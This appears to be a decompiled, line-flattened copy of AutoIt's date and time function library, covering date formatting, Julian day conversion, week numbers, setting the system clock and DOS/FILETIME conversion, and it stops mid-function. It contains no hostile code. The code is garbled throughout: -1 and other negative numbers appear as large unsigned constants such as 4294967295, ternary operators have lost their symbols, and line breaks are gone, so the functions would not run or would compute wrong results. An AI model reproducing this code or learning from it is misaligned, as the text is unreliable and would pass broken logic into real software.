_DATENEXTMONTHNUM ($IMONTHNUM ) SELECT CASE NOT STRINGISINT ($IMONTHNUM ) RETURN SETERROR (1 , 0 , 0 ) CASE NOT __DATEISMONTH ($IMONTHNUM ) RETURN SETERROR (2 , 0 , 0 ) CASE ELSE LOCAL $INEXTMONTHNUM IF $IMONTHNUM = 12 THEN $INEXTMONTHNUM = 1 ELSE $INEXTMONTHNUM = $IMONTHNUM + 1 ENDIF $INEXTMONTHNUM = STRINGFORMAT ("%02d" , $INEXTMONTHNUM ) RETURN $INEXTMONTHNUM ENDSELECT ENDFUNC FUNC _DATENEXTMONTHYEAR ($IMONTHNUM , $IYEAR ) SELECT CASE NOT STRINGISINT ($IMONTHNUM ) OR NOT STRINGISINT ($IYEAR ) RETURN SETERROR (1 , 0 , 0 ) CASE NOT __DATEISMONTH ($IMONTHNUM ) RETURN SETERROR (2 , 0 , 0 ) CASE ELSE LOCAL $INEXTYEAR IF $IMONTHNUM = 12 THEN $INEXTYEAR = $IYEAR + 1 ELSE $INEXTYEAR = $IYEAR ENDIF $INEXTYEAR = STRINGFORMAT ("%04d" , $INEXTYEAR ) RETURN $INEXTYEAR ENDSELECT ENDFUNC FUNC _DATETIMEFORMAT ($SDATE , $STYPE ) LOCAL $ASDATEPART [4 ] , $ASTIMEPART [4 ] LOCAL $STEMPDATE = "" , $STEMPTIME = "" LOCAL $SAM , $SPM , $STEMPSTRING = "" IF NOT _DATEISVALID ($SDATE ) THEN RETURN SETERROR (1 , 0 , "" ) ENDIF IF $STYPE < 0 OR $STYPE > 5 OR NOT ISINT ($STYPE ) THEN RETURN SETERROR (2 , 0 , "" ) ENDIF _DATETIMESPLIT ($SDATE , $ASDATEPART , $ASTIMEPART ) SWITCH $STYPE CASE 0 $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_SSHORTDATE ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $STEMPDATE = $STEMPSTRING ELSE $STEMPDATE = "M/d/yyyy" ENDIF IF $ASTIMEPART [0 ] > 1 THEN $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_STIMEFORMAT ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $STEMPTIME = $STEMPSTRING ELSE $STEMPTIME = "h:mm:ss tt" ENDIF ENDIF CASE 1 $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_SLONGDATE ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $STEMPDATE = $STEMPSTRING ELSE $STEMPDATE = "dddd, MMMM dd, yyyy" ENDIF CASE 2 $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_SSHORTDATE ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $STEMPDATE = $STEMPSTRING ELSE $STEMPDATE = "M/d/yyyy" ENDIF CASE 3 IF $ASTIMEPART [0 ] > 1 THEN $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_STIMEFORMAT ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $STEMPTIME = $STEMPSTRING ELSE $STEMPTIME = "h:mm:ss tt" ENDIF ENDIF CASE 4 IF $ASTIMEPART [0 ] > 1 THEN $STEMPTIME = "hh:mm" ENDIF CASE 5 IF $ASTIMEPART [0 ] > 1 THEN $STEMPTIME = "hh:mm:ss" ENDIF ENDSWITCH IF $STEMPDATE <> "" THEN $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_SDATE ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $STEMPDATE = STRINGREPLACE ($STEMPDATE , "/" , $STEMPSTRING ) ENDIF LOCAL $IWDAY = _DATETODAYOFWEEK ($ASDATEPART [1 ] , $ASDATEPART [2 ] , $ASDATEPART [3 ] ) $ASDATEPART [3 ] = STRINGRIGHT ("0" & $ASDATEPART [3 ] , 2 ) $ASDATEPART [2 ] = STRINGRIGHT ("0" & $ASDATEPART [2 ] , 2 ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "d" , "@" ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "m" , "#" ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "y" , "&" ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "@@@@" , _DATEDAYOFWEEK ($IWDAY , 0 ) ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "@@@" , _DATEDAYOFWEEK ($IWDAY , 1 ) ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "@@" , $ASDATEPART [3 ] ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "@" , STRINGREPLACE (STRINGLEFT ($ASDATEPART [3 ] , 1 ) , "0" , "" ) & STRINGRIGHT ($ASDATEPART [3 ] , 1 ) ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "####" , _DATETOMONTH ($ASDATEPART [2 ] , 0 ) ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "###" , _DATETOMONTH ($ASDATEPART [2 ] , 1 ) ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "##" , $ASDATEPART [2 ] ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "#" , STRINGREPLACE (STRINGLEFT ($ASDATEPART [2 ] , 1 ) , "0" , "" ) & STRINGRIGHT ($ASDATEPART [2 ] , 1 ) ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "&&&&" , $ASDATEPART [1 ] ) $STEMPDATE = STRINGREPLACE ($STEMPDATE , "&&" , STRINGRIGHT ($ASDATEPART [1 ] , 2 ) ) ENDIF IF $STEMPTIME <> "" THEN $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_S1159 ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $SAM = $STEMPSTRING ELSE $SAM = "AM" ENDIF $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_S2359 ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $SPM = $STEMPSTRING ELSE $SPM = "PM" ENDIF $STEMPSTRING = _WINAPI_GETLOCALEINFO ($LOCALE_USER_DEFAULT , $LOCALE_STIME ) IF NOT @ERROR AND NOT ($STEMPSTRING = "" ) THEN $STEMPTIME = STRINGREPLACE ($STEMPTIME , ":" , $STEMPSTRING ) ENDIF IF STRINGINSTR ($STEMPTIME , "tt" ) THEN IF $ASTIMEPART [1 ] < 12 THEN $STEMPTIME = STRINGREPLACE ($STEMPTIME , "tt" , $SAM ) IF $ASTIMEPART [1 ] = 0 THEN $ASTIMEPART [1 ] = 12 ELSE $STEMPTIME = STRINGREPLACE ($STEMPTIME , "tt" , $SPM ) IF $ASTIMEPART [1 ] > 12 THEN $ASTIMEPART [1 ] = $ASTIMEPART [1 ] + 4294967284 ENDIF ENDIF $ASTIMEPART [1 ] = STRINGRIGHT ("0" & $ASTIMEPART [1 ] , 2 ) $ASTIMEPART [2 ] = STRINGRIGHT ("0" & $ASTIMEPART [2 ] , 2 ) $ASTIMEPART [3 ] = STRINGRIGHT ("0" & $ASTIMEPART [3 ] , 2 ) $STEMPTIME = STRINGREPLACE ($STEMPTIME , "hh" , STRINGFORMAT ("%02d" , $ASTIMEPART [1 ] ) ) $STEMPTIME = STRINGREPLACE ($STEMPTIME , "h" , STRINGREPLACE (STRINGLEFT ($ASTIMEPART [1 ] , 1 ) , "0" , "" ) & STRINGRIGHT ($ASTIMEPART [1 ] , 1 ) ) $STEMPTIME = STRINGREPLACE ($STEMPTIME , "mm" , STRINGFORMAT ("%02d" , $ASTIMEPART [2 ] ) ) $STEMPTIME = STRINGREPLACE ($STEMPTIME , "ss" , STRINGFORMAT ("%02d" , $ASTIMEPART [3 ] ) ) $STEMPDATE = STRINGSTRIPWS ($STEMPDATE & " " & $STEMPTIME , $STR_STRIPLEADING + $STR_STRIPTRAILING ) ENDIF RETURN $STEMPDATE ENDFUNC FUNC _DATETIMESPLIT ($SDATE , BYREF $ADATEPART , BYREF $ITIMEPART ) LOCAL $SDATETIME = STRINGSPLIT ($SDATE , " T" ) IF $SDATETIME [0 ] > 0 THEN $ADATEPART = STRINGSPLIT ($SDATETIME [1 ] , "/-." ) IF $SDATETIME [0 ] > 1 THEN $ITIMEPART = STRINGSPLIT ($SDATETIME [2 ] , ":" ) IF UBOUND ($ITIMEPART ) < 4 THEN REDIM $ITIMEPART [4 ] ELSE DIM $ITIMEPART [4 ] ENDIF IF UBOUND ($ADATEPART ) < 4 THEN REDIM $ADATEPART [4 ] FOR $X = 1 TO 3 IF STRINGISINT ($ADATEPART [$X ] ) THEN $ADATEPART [$X ] = INT ($ADATEPART [$X ] ) ELSE $ADATEPART [$X ] = + 4294967295 ENDIF IF STRINGISINT ($ITIMEPART [$X ] ) THEN $ITIMEPART [$X ] = INT ($ITIMEPART [$X ] ) ELSE $ITIMEPART [$X ] = 0 ENDIF NEXT RETURN 1 ENDFUNC FUNC _DATETODAYOFWEEK ($IYEAR , $IMONTH , $IDAY ) IF NOT _DATEISVALID ($IYEAR & "/" & $IMONTH & "/" & $IDAY ) THEN RETURN SETERROR (1 , 0 , "" ) ENDIF LOCAL $I_FACTORA = INT ((14 - $IMONTH ) / 12 ) LOCAL $I_FACTORY = $IYEAR - $I_FACTORA LOCAL $I_FACTORM = $IMONTH + (12 * $I_FACTORA ) + 4294967294 LOCAL $I_FACTORD = MOD ($IDAY + $I_FACTORY + INT ($I_FACTORY / 4 ) - INT ($I_FACTORY / 100 ) + INT ($I_FACTORY / 400 ) + INT ((31 * $I_FACTORM ) / 12 ) , 7 ) RETURN $I_FACTORD + 1 ENDFUNC FUNC _DATETODAYOFWEEKISO ($IYEAR , $IMONTH , $IDAY ) LOCAL $IDOW = _DATETODAYOFWEEK ($IYEAR , $IMONTH , $IDAY ) IF @ERROR THEN RETURN SETERROR (1 , 0 , "" ) ENDIF IF $IDOW >= 2 THEN RETURN $IDOW + 4294967295 RETURN 7 ENDFUNC FUNC _DATETODAYVALUE ($IYEAR , $IMONTH , $IDAY ) IF NOT _DATEISVALID (STRINGFORMAT ("%04d/%02d/%02d" , $IYEAR , $IMONTH , $IDAY ) ) THEN RETURN SETERROR (1 , 0 , "" ) ENDIF IF $IMONTH < 3 THEN $IMONTH = $IMONTH + 12 $IYEAR = $IYEAR + 4294967295 ENDIF LOCAL $I_FACTORA = INT ($IYEAR / 100 ) LOCAL $I_FACTORB = INT ($I_FACTORA / 4 ) LOCAL $I_FACTORC = 2 - $I_FACTORA + $I_FACTORB LOCAL $I_FACTORE = INT (1461 * ($IYEAR + 4716 ) / 4 ) LOCAL $I_FACTORF = INT (153 * ($IMONTH + 1 ) / 5 ) LOCAL $IJULIANDATE = $I_FACTORC + $IDAY + $I_FACTORE + $I_FACTORF - 1524.500000 RETURN $IJULIANDATE ENDFUNC FUNC _DATETOMONTH ($IMONNUM , $IFORMAT = DEFAULT ) IF $IFORMAT = DEFAULT THEN $IFORMAT = 0 $IMONNUM = INT ($IMONNUM ) IF NOT __DATEISMONTH ($IMONNUM ) THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $TSYSTEMTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Year" , @YEAR ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Month" , $IMONNUM ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Day" , 1 ) RETURN _WINAPI_GETDATEFORMAT (BITAND ($IFORMAT , $DMW_LOCALE_LONGNAME ) $LOCALE_USER_DEFAULT $LOCALE_INVARIANT , $TSYSTEMTIME , 0 , BITAND ($IFORMAT , $DMW_SHORTNAME ) "MMM" "MMMM" ) ENDFUNC FUNC _DAYVALUETODATE ($IJULIANDATE , BYREF $IYEAR , BYREF $IMONTH , BYREF $IDAY ) IF $IJULIANDATE < 0 OR NOT ISNUMBER ($IJULIANDATE ) THEN RETURN SETERROR (1 , 0 , 0 ) ENDIF LOCAL $I_FACTORZ = INT ($IJULIANDATE + 0.500000 ) LOCAL $I_FACTORW = INT (($I_FACTORZ - 1867216.250000 ) / 36524.250000 ) LOCAL $I_FACTORX = INT ($I_FACTORW / 4 ) LOCAL $I_FACTORA = $I_FACTORZ + 1 + $I_FACTORW - $I_FACTORX LOCAL $I_FACTORB = $I_FACTORA + 1524 LOCAL $I_FACTORC = INT (($I_FACTORB - 122.100000 ) / 365.250000 ) LOCAL $I_FACTORD = INT (365.250000 * $I_FACTORC ) LOCAL $I_FACTORE = INT (($I_FACTORB - $I_FACTORD ) / 30.600100 ) LOCAL $I_FACTORF = INT (30.600100 * $I_FACTORE ) $IDAY = $I_FACTORB - $I_FACTORD - $I_FACTORF IF $I_FACTORE + 4294967295 < 13 THEN $IMONTH = $I_FACTORE + 4294967295 ELSE $IMONTH = $I_FACTORE + 4294967283 ENDIF IF $IMONTH < 3 THEN $IYEAR = $I_FACTORC + 4294962581 ELSE $IYEAR = $I_FACTORC + 4294962580 ENDIF $IYEAR = STRINGFORMAT ("%04d" , $IYEAR ) $IMONTH = STRINGFORMAT ("%02d" , $IMONTH ) $IDAY = STRINGFORMAT ("%02d" , $IDAY ) RETURN $IYEAR & "/" & $IMONTH & "/" & $IDAY ENDFUNC FUNC _DATE_JULIANDAYNO ($IYEAR , $IMONTH , $IDAY ) LOCAL $SFULLDATE = STRINGFORMAT ("%04d/%02d/%02d" , $IYEAR , $IMONTH , $IDAY ) IF NOT _DATEISVALID ($SFULLDATE ) THEN RETURN SETERROR (1 , 0 , "" ) ENDIF LOCAL $IJDAY = 0 LOCAL $AIDAYSINMONTH = _DAYSINMONTH ($IYEAR ) FOR $ICNTR = 1 TO $IMONTH + 4294967295 $IJDAY = $IJDAY + $AIDAYSINMONTH [$ICNTR ] NEXT $IJDAY = ($IYEAR * 1000 ) + ($IJDAY + $IDAY ) RETURN $IJDAY ENDFUNC FUNC _JULIANTODATE ($IJDAY , $SSEP = "/" ) LOCAL $IYEAR = INT ($IJDAY / 1000 ) LOCAL $IDAYS = MOD ($IJDAY , 1000 ) LOCAL $IMAXDAYS = 365 IF _DATEISLEAPYEAR ($IYEAR ) THEN $IMAXDAYS = 366 IF $IDAYS > $IMAXDAYS THEN RETURN SETERROR (1 , 0 , "" ) ENDIF LOCAL $AIDAYSINMONTH = _DAYSINMONTH ($IYEAR ) LOCAL $IMONTH = 1 WHILE $IDAYS > $AIDAYSINMONTH [$IMONTH ] $IDAYS = $IDAYS - $AIDAYSINMONTH [$IMONTH ] $IMONTH = $IMONTH + 1 WEND RETURN STRINGFORMAT ("%04d%s%02d%s%02d" , $IYEAR , $SSEP , $IMONTH , $SSEP , $IDAYS ) ENDFUNC FUNC _NOW () RETURN _DATETIMEFORMAT (@YEAR & "/" & @MON & "/" & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC , 0 ) ENDFUNC FUNC _NOWCALC () RETURN @YEAR & "/" & @MON & "/" & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC ENDFUNC FUNC _NOWCALCDATE () RETURN @YEAR & "/" & @MON & "/" & @MDAY ENDFUNC FUNC _NOWDATE () RETURN _DATETIMEFORMAT (@YEAR & "/" & @MON & "/" & @MDAY , 0 ) ENDFUNC FUNC _NOWTIME ($STYPE = 3 ) IF $STYPE < 3 OR $STYPE > 5 THEN $STYPE = 3 RETURN _DATETIMEFORMAT (@YEAR & "/" & @MON & "/" & @MDAY & " " & @HOUR & ":" & @MIN & ":" & @SEC , $STYPE ) ENDFUNC FUNC _SETDATE ($IDAY , $IMONTH = 0 , $IYEAR = 0 ) IF $IYEAR = 0 THEN $IYEAR = @YEAR IF $IMONTH = 0 THEN $IMONTH = @MON IF NOT _DATEISVALID ($IYEAR & "/" & $IMONTH & "/" & $IDAY ) THEN RETURN 1 LOCAL $TSYSTEMTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLCALL ("kernel32.dll" , "none" , "GetLocalTime" , "struct*" , $TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Day" , $IDAY ) IF $IMONTH > 0 THEN DLLSTRUCTSETDATA ($TSYSTEMTIME , "Month" , $IMONTH ) IF $IYEAR > 0 THEN DLLSTRUCTSETDATA ($TSYSTEMTIME , "Year" , $IYEAR ) LOCAL $IRETURN = _DATE_TIME_SETLOCALTIME ($TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN INT ($IRETURN ) ENDFUNC FUNC _SETTIME ($IHOUR , $IMINUTE , $ISECOND = 0 , $IMSECONDS = 0 ) IF $IHOUR < 0 OR $IHOUR > 23 THEN RETURN 1 IF $IMINUTE < 0 OR $IMINUTE > 59 THEN RETURN 1 IF $ISECOND < 0 OR $ISECOND > 59 THEN RETURN 1 IF $IMSECONDS < 0 OR $IMSECONDS > 999 THEN RETURN 1 LOCAL $TSYSTEMTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLCALL ("kernel32.dll" , "none" , "GetLocalTime" , "struct*" , $TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Hour" , $IHOUR ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Minute" , $IMINUTE ) IF $ISECOND > 0 THEN DLLSTRUCTSETDATA ($TSYSTEMTIME , "Second" , $ISECOND ) IF $IMSECONDS > 0 THEN DLLSTRUCTSETDATA ($TSYSTEMTIME , "MSeconds" , $IMSECONDS ) LOCAL $IRETURN = _DATE_TIME_SETLOCALTIME ($TSYSTEMTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN INT ($IRETURN ) ENDFUNC FUNC _TICKSTOTIME ($ITICKS , BYREF $IHOURS , BYREF $IMINS , BYREF $ISECS ) IF NUMBER ($ITICKS ) > 0 THEN $ITICKS = INT ($ITICKS / 1000 ) $IHOURS = INT ($ITICKS / 3600 ) $ITICKS = MOD ($ITICKS , 3600 ) $IMINS = INT ($ITICKS / 60 ) $ISECS = MOD ($ITICKS , 60 ) RETURN 1 ELSEIF NUMBER ($ITICKS ) = 0 THEN $IHOURS = 0 $ITICKS = 0 $IMINS = 0 $ISECS = 0 RETURN 1 ELSE RETURN SETERROR (1 , 0 , 0 ) ENDIF ENDFUNC FUNC _TIMETOTICKS ($IHOURS = @HOUR , $IMINS = @MIN , $ISECS = @SEC ) IF STRINGISINT ($IHOURS ) AND STRINGISINT ($IMINS ) AND STRINGISINT ($ISECS ) THEN LOCAL $ITICKS = 1000 * ((3600 * $IHOURS ) + (60 * $IMINS ) + $ISECS ) RETURN $ITICKS ELSE RETURN SETERROR (1 , 0 , 0 ) ENDIF ENDFUNC FUNC _WEEKNUMBERISO ($IYEAR = @YEAR , $IMONTH = @MON , $IDAY = @MDAY ) IF $IDAY > 31 OR $IDAY < 1 THEN RETURN SETERROR (1 , 0 , + 4294967295 ) ELSEIF NOT __DATEISMONTH ($IMONTH ) THEN RETURN SETERROR (2 , 0 , + 4294967295 ) ELSEIF $IYEAR < 1 OR $IYEAR > 2999 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) ENDIF LOCAL $IDOW = _DATETODAYOFWEEKISO ($IYEAR , $IMONTH , $IDAY ) + 4294967295 LOCAL $IDOW0101 = _DATETODAYOFWEEKISO ($IYEAR , 1 , 1 ) + 4294967295 IF ($IMONTH = 1 AND 3 < $IDOW0101 AND $IDOW0101 < 7 - ($IDAY + 4294967295 ) ) THEN $IDOW = $IDOW0101 + 4294967295 $IDOW0101 = _DATETODAYOFWEEKISO ($IYEAR + 4294967295 , 1 , 1 ) + 4294967295 $IMONTH = 12 $IDAY = 31 $IYEAR = $IYEAR + 4294967295 ELSEIF ($IMONTH = 12 AND 30 - ($IDAY + 4294967295 ) < _DATETODAYOFWEEKISO ($IYEAR + 1 , 1 , 1 ) + 4294967295 AND _DATETODAYOFWEEKISO ($IYEAR + 1 , 1 , 1 ) + 4294967295 < 4 ) THEN RETURN 1 ENDIF RETURN INT ((_DATETODAYOFWEEKISO ($IYEAR , 1 , 1 ) + 4294967295 < 4 ) + 4 * ($IMONTH + 4294967295 ) + (2 * ($IMONTH + 4294967295 ) + ($IDAY + 4294967295 ) + $IDOW0101 - $IDOW + 6 ) * 36 / 256 ) ENDFUNC FUNC _WEEKNUMBER ($IYEAR = @YEAR , $IMONTH = @MON , $IDAY = @MDAY , $IWEEKSTART = 1 ) IF $IDAY > 31 OR $IDAY < 1 THEN RETURN SETERROR (1 , 0 , + 4294967295 ) ELSEIF NOT __DATEISMONTH ($IMONTH ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) ELSEIF $IYEAR < 1 OR $IYEAR > 2999 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSEIF $IWEEKSTART < 1 OR $IWEEKSTART > 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) ENDIF LOCAL $ISTARTWEEK1 , $IENDWEEK1 LOCAL $IDOW0101 = _DATETODAYOFWEEKISO ($IYEAR , 1 , 1 ) LOCAL $IDATE = $IYEAR & "/" & $IMONTH & "/" & $IDAY IF $IWEEKSTART = 1 THEN IF $IDOW0101 = 6 THEN $ISTARTWEEK1 = 0 ELSE $ISTARTWEEK1 = + 4294967295 * $IDOW0101 + 4294967295 ENDIF $IENDWEEK1 = $ISTARTWEEK1 + 6 ELSE $ISTARTWEEK1 = $IDOW0101 * + 4294967295 $IENDWEEK1 = $ISTARTWEEK1 + 6 ENDIF LOCAL $ISTARTWEEK1NY LOCAL $IENDWEEK1DATE = _DATEADD ("d" , $IENDWEEK1 , $IYEAR & "/01/01" ) LOCAL $IDOW0101NY = _DATETODAYOFWEEKISO ($IYEAR + 1 , 1 , 1 ) IF $IWEEKSTART = 1 THEN IF $IDOW0101NY = 6 THEN $ISTARTWEEK1NY = 0 ELSE $ISTARTWEEK1NY = + 4294967295 * $IDOW0101NY + 4294967295 ENDIF ELSE $ISTARTWEEK1NY = $IDOW0101NY * + 4294967295 ENDIF LOCAL $ISTARTWEEK1DATENY = _DATEADD ("d" , $ISTARTWEEK1NY , $IYEAR + 1 & "/01/01" ) LOCAL $ICURRDATEDIFF = _DATEDIFF ("d" , $IENDWEEK1DATE , $IDATE ) + 4294967295 LOCAL $ICURRDATEDIFFNY = _DATEDIFF ("d" , $ISTARTWEEK1DATENY , $IDATE ) IF $ICURRDATEDIFF >= 0 AND $ICURRDATEDIFFNY < 0 THEN RETURN 2 + INT ($ICURRDATEDIFF / 7 ) IF $ICURRDATEDIFF < 0 OR $ICURRDATEDIFFNY >= 0 THEN RETURN 1 ENDFUNC FUNC _DAYSINMONTH ($IYEAR ) LOCAL $ADAYS = [12 , 31 , (_DATEISLEAPYEAR ($IYEAR ) 29 28 ) , 31 , 30 , 31 , 30 , 31 , 31 , 30 , 31 , 30 , 31 ] RETURN $ADAYS ENDFUNC FUNC __DATE_TIME_CLONESYSTEMTIME ($PSYSTEMTIME ) LOCAL $TSYSTEMTIME1 = DLLSTRUCTCREATE ($TAGSYSTEMTIME , $PSYSTEMTIME ) LOCAL $TSYSTEMTIME2 = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "Month" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "Month" ) ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "Day" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "Day" ) ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "Year" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "Year" ) ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "Hour" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "Hour" ) ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "Minute" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "Minute" ) ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "Second" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "Second" ) ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "MSeconds" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "MSeconds" ) ) DLLSTRUCTSETDATA ($TSYSTEMTIME2 , "DOW" , DLLSTRUCTGETDATA ($TSYSTEMTIME1 , "DOW" ) ) RETURN $TSYSTEMTIME2 ENDFUNC FUNC _DATE_TIME_COMPAREFILETIME ($TFILETIME1 , $TFILETIME2 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "long" , "CompareFileTime" , "struct*" , $TFILETIME1 , "struct*" , $TFILETIME2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _DATE_TIME_DOSDATETIMETOFILETIME ($IFATDATE , $IFATTIME ) LOCAL $TTIME = DLLSTRUCTCREATE ($TAGFILETIME ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "DosDateTimeToFileTime" , "word" , $IFATDATE , "word" , $IFATTIME , "struct*" , $TTIME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN SETEXTENDED ($ARESULT [0 ] , $TTIME ) ENDFUNC FUNC _DATE_TIME_DOSDATETOARRAY ($IDOSDATE ) LOCAL $ADATE [3 ] $ADATE [0 ] = BITAND ($IDOSDATE , 31 ) $ADATE [1 ] = BITAND (BITSHIFT ($IDOSDATE , 5 ) , 15 ) $ADATE [2 ] = BITAND (BITSHIFT ($IDOSDATE , 9 ) , 63 ) + 1980 RETURN $ADATE ENDFUNC FUNC _DATE_TIME_DOSDATETIMETOARRAY ($IDOSDATE , $IDOSTIME ) LOCAL $ADATE [6 ] $ADATE [0 ] = BITAND ($IDOSDATE , 31 ) $ADATE [1 ] = BITAND (BITSHIFT ($IDOSDATE , 5 ) , 15 ) $ADATE [2 ] = BITAND (BITSHIFT ($IDOSDATE , 9 ) , 63 ) + 1980 $ADATE [5 ] = BITAND ($IDOSTIME , 31 ) * 2 $ADATE [4 ] = BITAND (BITSHIFT ($IDOSTIME , 5 ) , 63 ) $ADATE [3 ] = BITAND (BITSHIFT ($IDOSTIME , 11 ) , 31 ) RETURN $ADATE ENDFUNC FUNC _DATE_TIME_DOSDATETIMETOSTR ($IDOSDATE , $IDOSTIME ) LOCAL $ADATE = _DATE_TIME_DOSDATETIMETOARRAY ($IDOSDATE , $IDOSTIME ) RETURN STRINGFORMAT ("%02d/%02d/%04d %02d:%02d:%02d" , $ADATE [0 ] , $ADATE [1 ] , $ADATE [2 ] , $ADATE [3 ] , $ADATE [4 ] , $ADATE [5 ] ) ENDFUNC FUNC _DATE_TIME_DOSDATETOSTR ($IDOSDATE ) LOCAL $ADATE = _DATE_TIME_DOSDATETOARRAY ($IDOSDATE ) RETURN STRINGFORMAT ("%02d/%02d/%04d" , $ADATE [0 ] , $ADATE [1 ] , $ADATE [2 ] ) ENDFUNC FUNC _DATE_TIME_DOSTIMETOARRAY ($IDOSTIME ) LOCAL $ATIME [3 ] $ATIME [2 ] = BITAND ($IDOSTIME , 31 ) * 2 $ATIME [1 ] = BITAND (BITSHIFT ($IDOSTIME , 5 ) , 63 ) $ATIME [0 ] = BITAND (BITSHIFT ($IDOSTIME , 11 ) , 31 ) RETURN $ATIME ENDFUNC FUNC _DATE_TIME_DOSTIMETOSTR ($IDOSTIME ) LOCAL $ATIME = _DATE_TIME_DOSTIMETOARRAY ($IDOSTIME ) RETURN STRINGFORMAT ("%02d:%02d:%02d" , $ATIME [0 ] , $ATIME [1 ] , $ATIME [2 ] ) ENDFUNC FUNC _DATE_TIME_ENCODEFILETIME ($IMONTH , $IDAY , $IYEAR , $IHOUR = 0 , $IMINUTE = 0 , $ISECOND = 0 , $IMSECONDS = 0 ) LOCAL $TSYSTEMTIME = _DATE_TIME_ENCODESYSTEMTIME ($IMONTH , $IDAY , $IYEAR , $IHOUR , $IMINUTE , $ISECOND , $IMSECONDS ) RETURN _DATE_TIME_SYSTEMTIMETOFILETIME ($TSYSTEMTIME ) ENDFUNC FUNC _DATE_TIME_ENCODESYSTEMTIME ($IMONTH , $IDAY , $IYEAR , $IHOUR = 0 , $IMINUTE = 0 , $ISECOND = 0 , $IMSECONDS = 0 ) LOCAL $TSYSTEMTIME = DLLSTRUCTCREATE ($TAGSYSTEMTIME ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Month" , $IMONTH ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Day" , $IDAY ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Year" , $IYEAR ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Hour" , $IHOUR ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Minute" , $IMINUTE ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "Second" , $ISECOND ) DLLSTRUCTSETDATA ($TSYSTEMTIME , "MSeconds" , $IMSECONDS ) RETURN $TSYSTEMTIME ENDFUNC FUNC _DATE_TIME_FILETIMETOARRAY (BYREF $TFILETIME ) IF ((DLLSTRUCTGETDATA ($TFILETIME , 1 ) + DLLSTRUCTGETDATA ($TFILETIME , 2 ) ) = 0 ) THEN RETURN SETERROR (10 , 0 , 0 ) LOCAL $TSYSTEMTIME = _DATE_TIME_FILETIMETOSYSTEMTIME ($TFILETIME ) IF @ERROR THEN RETURN 